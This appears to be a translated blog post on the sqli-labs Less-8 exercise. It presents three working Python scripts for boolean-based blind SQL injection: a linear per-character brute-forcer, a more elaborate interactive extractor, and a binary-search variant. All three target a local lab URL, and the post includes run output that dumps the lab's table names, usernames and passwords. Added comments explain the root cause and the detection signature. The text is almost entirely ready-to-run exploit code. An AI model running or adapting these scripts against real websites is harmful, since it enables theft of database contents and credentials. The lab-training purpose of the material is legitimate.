The following is the Python script for the eighth level (Less-8) of sql-labs.
Alas, it took a long time to debug
Python's loops do not use {}, so when writing them you must pay close attention to which loop is nested inside which and get the indentation exactly right. Otherwise, even though no error is reported, the result of the run will be wrong (╬▔皿▔)╯
import requests

# Boolean-based blind extraction against the sqli-labs Less-8 exercise.
# Less-8 shows the banner "You are in.........." when the condition injected
# into the `id` parameter is true. The script never reads data off the page;
# it asks one yes/no question per GET and rebuilds every name and value from
# the answers. The server-side cause is `id` being concatenated into the SQL
# text - a parameterised query removes the oracle entirely - and the traffic
# shape (long runs of requests to one URL that differ in a single number or
# character) is the pattern blind-injection detection rules match on.
#
# NOTE(review): the payload f-strings are written with double-quote
# delimiters below; the pasted listing showed them single-quoted even though
# they contain single quotes, which would not parse.

# Browser-like headers sent with every probe. Nothing below depends on them.
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept': 'text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'
}

# Results live in module-level variables. The *_length / *_counts values are
# never reset before a search, so a loop that finds no match leaves the value
# from the previous iteration in place.
database_length = 0
database_name = ''
table_counts = 0
table_length = 0
table_name = ''
column_counts = 0
column_length = 0
column_name = ''
information_counts = 0
information_length = 0
information_name = ''

# `id=1'` closes the original string literal. Each payload below starts with
# ` and ...` and ends with `-- + ` (a MySQL comment; the `+` is decoded as a
# space by the server, giving `-- ` its required trailing blank).
base_url = "http://127.0.0.1/sql-labs/Less-8/?id=1'"

# Database length: ask length(database())=i for i in 1..49 and stop at the
# first "yes".
for i in range(1, 50):
    payload = f' and length(database())={i} -- + '
    new_url = base_url + payload
    response = requests.get(new_url, headers=header)
    if 'You are in..........' in response.text:
        database_length = i
        break

# Name database: for every position try ASCII 65..122 ('A'..'z', which covers
# letters, '_' and a few punctuation marks but no digits). A position where
# nothing matches is silently skipped. Note this loop tests the shorter 'You'
# rather than the full banner the other loops use.
for i in range(1, database_length + 1):
    for m in range(65, 123):
        payload = f" and substr(database(),{i},1)='{chr(m)}' -- + "
        new_url = base_url + payload
        response = requests.get(new_url, headers=header)
        if 'You' in response.text:
            database_name = database_name + chr(m)
            break

# Number of tables in the `security` schema (hard-coded; the name recovered
# above is not used here).
for i in range(1, 100):
    payload = f" and (select count(table_name) from information_schema.tables where table_schema='security')={i} -- + "
    new_url = base_url + payload
    response = requests.get(new_url, headers=header)
    if 'You are in..........' in response.text:
        table_counts = i
        break

# The length and name of each table, then its columns, then each column's
# rows - three nested levels. `limit {i},1` is offset i, so row 0 of each
# result set is never requested; that is why the run output below starts at
# the second table and shows an empty last entry at each level.
for i in range(1, table_counts + 1):
    table_name = ''
    # Table name length: first m in 1..49 for which length(...)=m holds.
    for m in range(1, 50):
        payload = f" and length((select table_name from information_schema.tables where table_schema='security' limit {i},1))={m} -- + "
        new_url = base_url + payload
        response = requests.get(new_url, headers=header)
        if 'You are in..........' in response.text:
            table_length = m
            break
    # Table name, one character per position from the same 65..122 range.
    for m in range(1, table_length + 1):
        for n in range(65, 123):
            payload = f" and substr((select table_name from information_schema.tables where table_schema='security' limit {i},1),{m},1)='{chr(n)}' -- + "
            new_url = base_url + payload
            response = requests.get(new_url, headers=header)
            if 'You are in..........' in response.text:
                table_name = table_name + chr(n)
                break
    print(f'The name of table {i} is: ' + table_name.lower())

    # Number of columns in this table. The recovered name is lower-cased
    # before being interpolated into the following queries.
    for a in range(1, 100):
        payload = f" and (select count(column_name) from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security')={a} -- + "
        new_url = base_url + payload
        response = requests.get(new_url, headers=header)
        if 'You are in..........' in response.text:
            column_counts = a
            break

    # The length and name of each column (same two-step pattern as the table).
    for b in range(1, column_counts + 1):
        column_name = ''
        for c in range(1, 50):
            payload = f" and length((select column_name from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security' limit {b},1))={c} -- + "
            new_url = base_url + payload
            response = requests.get(new_url, headers=header)
            if 'You are in..........' in response.text:
                column_length = c
                break
        for m in range(1, column_length + 1):
            for n in range(65, 123):
                payload = f" and substr((select column_name from information_schema.columns where table_name='{table_name.lower()}' and table_schema='security' limit {b},1),{m},1)='{chr(n)}' -- + "
                new_url = base_url + payload
                response = requests.get(new_url, headers=header)
                if 'You are in..........' in response.text:
                    column_name = column_name + chr(n)
                    break
        print(f'The name of column {b} is: ' + column_name.lower())

        # The number, length and value of the rows under this column. The row
        # count search starts at 0, so a column with no matching count in
        # 0..99 keeps the previous column's count.
        for x in range(0, 100):
            payload = f' and (select count({column_name.lower()}) from {table_name.lower()})={x} -- + '
            new_url = base_url + payload
            response = requests.get(new_url, headers=header)
            if 'You are in..........' in response.text:
                information_counts = x
                break
        for y in range(1, information_counts + 1):
            information_name = ''
            for z in range(1, 50):
                payload = f' and length((select {column_name.lower()} from {table_name.lower()} limit {y},1))={z} -- + '
                new_url = base_url + payload
                response = requests.get(new_url, headers=header)
                if 'You are in..........' in response.text:
                    information_length = z
                    break
            for j in range(1, information_length + 1):
                for k in range(65, 123):
                    payload = f" and substr((select {column_name.lower()} from {table_name.lower()} limit {y},1),{j},1)='{chr(k)}' -- + "
                    new_url = base_url + payload
                    response = requests.get(new_url, headers=header)
                    if 'You are in..........' in response.text:
                        information_name = information_name + chr(k)
                        break
            print(f'The name of data {y} is: ' + information_name.lower())

print('The database name is: ' + database_name)
print('The number of tables in this database is:' + str(table_counts))
Result of running it:
E:\python\python.exe "D:\python\test1\aql-labs\less-8 three.py" The name of Table 1 is: referers The name of column 1 is: referer The name of column 2 is: ip_address Column 3 is named: The name of Table 2 is: uagents The name of column 1 is: uagent The name of column 2 is: ip_address The name of column 3 is: username Column 4 is named: The name of Table 3 is: users The name of column 1 is: username The name of data 1 is: angelina The name of data 2 is: dummy The name of data 3 is: secure The name of data 4 is: stupid The name of data 5 is: superman The name of data 6 is: batman The name of data 7 is: admin The name of data 8 is: admin The name of data 9 is: admin The name of data 10 is: admin The name of data 11 is: dhakkan The name of data 12 is: admin The name of data 13 is: The name of column 2 is: password The name of data 1 is: ikillyou The name of data 2 is: pssword The name of data 3 is: crappy The name of data 4 is: stupidity The name of data 5 is: genius The name of data 6 is: moble The name of data 7 is: admin The name of data 8 is: admin The name of data 9 is: admin The name of data 10 is: admin The name of data 11 is: dumbo The name of data 12 is: admin The name of data 13 is: Column 3 is named: The name of data 1 is: The name of data 2 is: The name of data 3 is:
When you are first learning to write scripts, they may not turn out very well.
I also saw some code that was much better than mine:
# 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted
# 2. Explode the current database length
# 3. Define the database length blasting function Brute_length()
# 4. Explode the current database name
# 5. Define the database name blasting function Brute_database()
# 6. Explode all database lengths
# 7. Explode all database names
# 8. Explosion table name
# 9. Define the table name blasting function Brute_table()
# 10. Explode field names
# 11. Define field blasting function Brute_column()
# 12. Blasting data
# 13. Define the data blasting function data_dump()
#
# Interactive boolean-blind extraction against sqli-labs Less-8 ("blasting"
# is the author's word for brute-forcing). Every helper below asks one yes/no
# question per request: it appends a condition to the `id` parameter and
# tests whether `flag` (the page's success banner, as bytes) appears in the
# response body. Names are read back as one group_concat() string per level,
# so a single value is enough for each of schema, table, column and data.
# The cause on the server side is string-built SQL; a parameterised query
# would leave nothing for these probes to distinguish.
import requests
import time   # only referenced by the commented-out sleep calls below
import sys    # imported but not used

# 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted.
# DIS is overwritten by sql_Inject(); when true every probe URL is printed.
DIS = True
# Candidate byte values tried, in this order, for each character position:
# ',' '.' '_' '0'-'9' ':' then 'a'-'z', then '@' 'A'-'Z', then 33..75
# ('!'..'K', which overlaps the earlier digits and letters). Note that this
# rebinds the builtin name `list` for the whole module.
list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58]
for i in range(97, 123):
    list.append(i)
for i in range(64, 91):
    list.append(i)
for i in range(33, 76):
    list.append(i)


def sql_Inject(url, flag, display):
    """Drive the whole extraction interactively.

    url:     base URL; every payload is appended directly to it.
    flag:    bytes that appear in the response only when the injected
             condition is true.
    display: stored into the module global DIS; True prints each probe URL.

    After the current and full schema names are recovered, each of the three
    `while True` stages prompts for names with input() and repeats until the
    user answers "no". Typed names are passed straight into the query text.
    """
    global DIS
    DIS = display
    # 2. Explode the current database length
    current_length = Brute_length(url, flag, current=True)
    print("Current database length:", current_length)
    # 4. Explode the current database name
    current_database_name = Brute_database(url, current_length, flag, current=True)
    print("Current database name:", current_database_name)
    # 6. Explode all database lengths
    length = Brute_length(url, flag)
    print("Database full length:", length)
    # 7. Explode all database names
    all_databases = input("Brute all the databases?[yes/no]: ")
    if all_databases == 'yes':
        database_name = Brute_database(url, length, flag)
        print("Database name:", database_name)
    # 8. Explosion table name
    # (`next` shadows the builtin of the same name in all three stages.)
    while True:
        choose_database = input("choose the database: ")
        table_name = Brute_table(url, choose_database, flag)
        print("Database: %s" % choose_database)
        print("Table: %s" % table_name)
        print('')
        next = input("continue brute the tables?[yes/no]: ")
        if next == "no":
            break
    # 10. Explode field names
    while True:
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        column_name = Brute_column(url, choose_database, choose_table, flag)
        print("Table: %s.%s" % (choose_database, choose_table))
        print("Field: %s" % column_name)
        print('')
        next = input("continue brute the columns?[yes/no]: ")
        if next == "no":
            break
    # 12. Blasting data
    while True:
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        choose_column = input("choose the column: ")
        data = data_dump(url, choose_database, choose_table, choose_column, flag)
        print("Field: %s.%s.%s" % (choose_database, choose_table, choose_column))
        print("data: %s" % data)
        print('')
        next = input("continue dump the data?[yes/no]: ")
        if next == "no":
            break


# 13. Define the data blasting function data_dump()
def data_dump(url, database, table, column, flag):
    """Return group_concat(column) from database.table, one character at a time.

    Length first: `jump` grows in steps of 10 while `length(...) > jump`
    holds, steps back once, then `length` grows by one until the comparison
    fails; the total is jump + length. Each position is then matched against
    the module-level `list` of candidates; a position where no candidate
    matches is skipped without any output, so the returned string can be
    shorter than the measured length.
    """
    raw_url = url
    length = 1
    jump = 10
    data = ""
    # First determine the data length
    while True:
        # url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>10 -- +
        url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d -- + " % (column, database, table, jump)
        response = requests.get(url)
        if DIS:
            print(url)
        if flag in response.content:
            jump += 10
        else:
            jump -= 10
            break
    while True:
        # url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>11 -- +
        url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d -- + " % (column, database, table, jump + length)
        if DIS:
            print(url)
        response = requests.get(url)
        if flag in response.content:
            length += 1
        else:
            break
    data_length = length + jump
    # Explosion data
    for i in range(data_length):
        for ASCII in list:
            # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(id) from security.emails),1,1))='44' -- +
            url = raw_url + "' and ord(substr((select group_concat(%s) from %s.%s),%d,1))=%d -- + " % (column, database, table, i + 1, ASCII)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                data += chr(ASCII)
                break
            # time.sleep(5)
    return data


# 11. Define field blasting function Brute_column()
def Brute_column(url, database, table, flag):
    """Return group_concat(column_name) for database.table from information_schema.

    Same two-phase length search and per-position candidate scan as
    data_dump(); see there for the skipped-position caveat.
    """
    raw_url = url
    length = 1
    jump = 10
    column_name = ""
    # First determine the field length
    while True:
        # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails') )>10 -- +
        url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d -- + " % (database, table, jump)
        response = requests.get(url)
        if DIS:
            print(url)
        if flag in response.content:
            jump += 10
        else:
            jump -= 10
            break
    while True:
        # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 -- +
        url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d -- + " % (database, table, jump + length)
        if DIS:
            print(url)
        response = requests.get(url)
        if flag in response.content:
            length += 1
        else:
            break
    column_length = length + jump
    # Explode field name
    for i in range(column_length):
        for ASCII in list:
            # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails '),1,1))='44'-- +
            url = raw_url + "' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1))=%d -- + " % (database, table, i + 1, ASCII)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                column_name += chr(ASCII)
                break
            # time.sleep(5)
    return column_name


# 9. Define the table name blasting function Brute_table()
def Brute_table(url, database, flag):
    """Return group_concat(table_name) for the given schema from information_schema.

    Same two-phase length search and per-position candidate scan as
    data_dump(); see there for the skipped-position caveat.
    """
    raw_url = url
    length = 1
    jump = 10
    table_name = ""
    # First determine the length of the table name
    while True:
        # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>10 -- +
        url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d -- + " % (database, jump)
        response = requests.get(url)
        if DIS:
            print(url)
        if flag in response.content:
            jump += 10
        else:
            jump -= 10
            break
    while True:
        # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 -- +
        url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d -- + " % (database, jump + length)
        if DIS:
            print(url)
        response = requests.get(url)
        if flag in response.content:
            length += 1
        else:
            break
    table_length = length + jump
    # Explosion table name
    for i in range(table_length):
        for ASCII in list:
            # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1 ))='44'-- +
            url = raw_url + "' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1))=%d -- + " % (database, i + 1, ASCII)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                table_name += chr(ASCII)
                break
            # time.sleep(5)
    return table_name


# 5. Define the database name blasting function Brute_database()
def Brute_database(url, length, flag, current=False):
    """Return the current schema name, or group_concat(schema_name) of all schemas.

    length:  number of characters to recover (from Brute_length()).
    current: True probes database() with lowercase letters only (97..122);
             False probes the group_concat() of information_schema.schemata
             with the module-level `list` of candidates.
    A position with no matching candidate is skipped silently.
    """
    raw_url = url
    database_name = ""
    # 2. Explode the current database name
    if current:
        for i in range(length):
            for ASCII in range(97, 123):
                # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr(database(),1,1))=97 -- +
                url = raw_url + "' and ord(substr(database(),%d,1))=%d -- + " % (i + 1, ASCII)
                if DIS:
                    print(url)
                response = requests.get(url)
                if flag in response.content:
                    database_name += chr(ASCII)
                    break
                # time.sleep(5)
        return database_name
    # Explode all database names
    # ' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=97-- +
    else:
        for i in range(length):
            for ASCII in list:
                # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=44-- +
                url = raw_url + "' and ord(substr((select group_concat(schema_name) from information_schema.schemata),%d,1))=%d -- + " % (i + 1, ASCII)
                if DIS:
                    print(url)
                response = requests.get(url)
                if flag in response.content:
                    database_name += chr(ASCII)
                    break
                # time.sleep(5)
        return database_name


# 3. Define the database length blasting function Brute_length()
def Brute_length(url, flag, current=False):
    """Return the length of database(), or of group_concat(schema_name).

    current: True counts up from 1 while `length(database()) > n` holds and
             returns the first n for which it does not.
             False first advances `jump` in steps of 10, steps back once,
             then counts `length` up by one; returns jump + length.
    Every comparison is one request; there is no upper bound on the loops.
    """
    length = 1
    raw_url = url
    jump = 10
    # Determine whether to blast the current database
    if current:
        while True:
            # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>1 -- +
            url = raw_url + "' and length(database())>%d -- + " % length
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                length += 1
            else:
                break
        return length
    # Explode all database lengths
    else:
        while True:
            # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>10 -- +
            url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d -- + " % jump
            response = requests.get(url)
            if DIS:
                print(url)
            if flag in response.content:
                jump += 10
            else:
                jump -= 10
                break
        while True:
            # url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>1 -- +
            url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d -- + " % (jump + length)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                length += 1
            else:
                break
        return (length + jump)


if __name__ == "__main__":
    # `flag` is bytes because the helpers test it against response.content.
    url = "http://127.0.0.1/sql-labs/Less-8/?id=1"
    flag = b'You are in...'
    display = False
    sql_Inject(url, flag, display)
Result of running it:
E:\python\python.exe D:\python\test1\aql-labs\less-8.py Current database length: 8 Current database name: security Database full length: 67 Brute all the databases?[yes/no]: yes Database name: information_schema,challenges,mysql,performance_schema,security,sys choose the database: security Database:security Table: emails,referers,uagents,users continue brute the tables?[yes/no]: no choose the database: security choose the table: users Table: security.users Fields: id, username, password continue brute the columns?[yes/no]: no choose the database: security choose the table: users choose the column: username,password Fields: security.users.username,password Data: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4 continue dump the data?[yes/no]: no Process ended with exit code 0
This is obvious to others
However, both of these brute-force scripts are still rather slow. A binary search (the bisection method) can be used instead:
import requests

# Faster variant of the Less-8 boolean-blind probe: instead of trying every
# candidate value in turn, each unknown digit or character is located by
# binary search over its range, with at most two requests per step
# (`> middle`, then `< middle`). Only the current database name is recovered.
# The injected condition is wrapped in if(cond, 1, 0) and the answer is read
# from whether the success banner appears. The request pattern - many GETs
# to one endpoint differing only in a numeric literal - is the same
# observable a detection rule would match on as for the linear scripts.


def decide():
    """Binary-search the number of digits in length(database()).

    Compares the first character of length(length(database())) against
    `middle` in 0..9 and returns `middle` as soon as it is neither greater
    nor smaller. The two branches test different substrings of the banner
    ('You are in..........' and 'You are in...'). If the window closes with
    no equality hit the function falls off the end and returns None, which
    ruler() then compares with `i <= size` and raises TypeError.
    """
    left = 0
    right = 9
    while left <= right:
        middle = (left + right) // 2
        if 'You are in..........' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)>{middle}, 1, 0 )-- + ").text:
            left = middle + 1
        elif 'You are in...' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)<{middle}, 1, 0 )-- + ").text:
            right = middle - 1
        else:
            return middle


def ruler(size):
    """Recover length(database()) as a decimal string, one digit at a time.

    size: number of digits to recover (from decide()).
    Each digit is binary-searched the same way as in decide(); after a hit
    the window is reset to 0..126, which is wider than a single digit needs.
    Returns the digits converted with int(); if no digit was found the
    string is empty and int('') raises ValueError.
    """
    left = 0
    right = 9
    i = 1
    length = ''
    while left <= right and i <= size:
        middle = (left + right) // 2
        if 'You are in..........' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)>{middle}, 1, 0) -- + ").text:
            left = middle + 1
        elif 'You are in...' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)<{middle}, 1, 0) -- + ").text:
            right = middle - 1
        else:
            i += 1
            length += str(middle)
            left = 0
            right = 126
    return int(length)


def process(length):
    """Recover database() itself, one character at a time.

    length: number of characters to recover (from ruler()).
    The ASCII code of each position is binary-searched in 32..126; after a
    hit the window is reset to 0..126 (left bound 0 rather than 32). The
    partial result is printed after every character, which is what produces
    the incremental output shown below the listing. Returns the full string.
    """
    left = 32
    right = 126
    i = 1
    result = ''
    while left <= right and i <= length:
        middle = (left + right) // 2
        if 'You are in..........' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))>{middle}, 1, 0) -- + ").text:
            left = middle + 1
        elif 'You are in...' in requests.request('get', f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))<{middle}, 1, 0) -- + ").text:
            right = middle - 1
        else:
            i += 1
            result += str(chr(middle))
            left = 0
            right = 126
            print(result)
    return result


if __name__ == '__main__':
    size = decide()
    length = ruler(size)
    result = process(length)
This is only part of the code; the output of running it is as follows:
sec secu secur securi securit security Process ended with exit code 0